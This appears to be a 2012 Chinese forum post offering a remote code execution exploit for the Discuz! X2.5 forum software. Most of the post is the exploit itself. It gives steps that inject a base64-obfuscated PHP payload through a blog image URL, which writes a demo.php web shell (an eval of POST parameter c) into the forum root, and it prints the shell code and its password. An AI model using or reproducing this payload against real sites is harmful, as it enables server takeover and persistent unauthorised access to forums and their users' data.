Discuz! X2.5 远程代码执行漏洞及EXP 0day

发布时间:2012-4.30
发布作者:佚名

漏洞类型:代码执行

漏洞描述:

 

1.注册任意账户

2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了

3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码

<?php @eval($_POST[c]); ?>ok

<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
4.访问日志,论坛根目录下生成demo.php,一句发密码C

发表评论